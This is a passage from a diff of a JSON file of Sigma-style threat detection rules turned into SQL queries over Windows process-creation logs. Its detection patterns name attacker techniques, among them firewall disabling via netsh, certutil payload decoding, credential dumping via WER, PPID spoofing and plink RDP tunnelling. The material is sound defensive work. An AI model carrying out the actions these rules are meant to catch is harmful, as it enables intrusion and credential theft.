ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_renamed_createdump.yml" }, { - "title": "MSExchange Transport Agent Installation", - "id": "83809e84-4475-4b69-bc3e-4aad8568612f", - "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Suspicious Cmdl32 Execution", + "id": "f37aba28-a9e6-4045-882c-d5004043b337", + "status": "experimental", + "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" + "filename": "proc_creation_win_lolbin_cmdl32.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", + "status": "experimental", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1134.004" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Service Started/Stopped Via Wmic.EXE", - "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", "status": "experimental", - "description": "Detects usage of wmic to start or stop a service", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_wmic_service_manipulation.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "description": "Detects a suspicious program execution in Outlook temp folder", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.t1566.001" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" + ], + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + }, + { + "title": "Dropping Of Password Filter DLL", + "id": "b7966f4a-b333-455b-8370-8ca53c229762", "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", + "author": "Sreeman", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1036.003" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" }, { - "title": "File Decoded From Base64/Hex Via Certutil.EXE", - "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", "status": "test", - "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_decode.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Rundll32 With Suspicious Parent Process", - "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", - "status": "experimental", - "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", - "author": "CD_ROM_", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "status": "test", + "description": "Execution of plink to perform data exfiltration and tunneling", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1572" + ], + "falsepositives": [ + "Administrative activity" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_plink_susp_tunneling.yml" + }, + { + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "status": "test", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Administrative activity", + "Software installation" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_parent_explorer.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", + "title": "Firewall Disabled via Netsh.EXE", + "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "description": "Detects netsh commands that turns off the Windows firewall", + "author": "Fatih Sirin", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1562.004", + "attack.s0108" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": "proc_creation_win_netsh_fw_disable.yml" }, { - "title": "Curl.EXE Execution With Custom UserAgent", - "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", "status": "test", - "description": "Detects execution of curl.exe with custom useragent options", - "author": "frack113", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.001" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_curl_useragent.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "title": "Suspicious Rundll32 Invoking Inline VBScript", + "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Read Contents From Stdin Via Cmd.EXE", - "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.003" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_stdin_redirect.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", + "title": "Use of Setres.exe", + "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", + "author": "@gott_cyber", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + "Legitimate usage of Setres" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\setres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\choice' ESCAPE '\\')" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_lolbin_setres.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", - "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "title": "Rundll32 Registered COM Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "status": "test", + "description": "load malicious registered COM objects", "author": "frack113", "tags": [ - "attack.impact", - "attack.t1486" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", - "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ 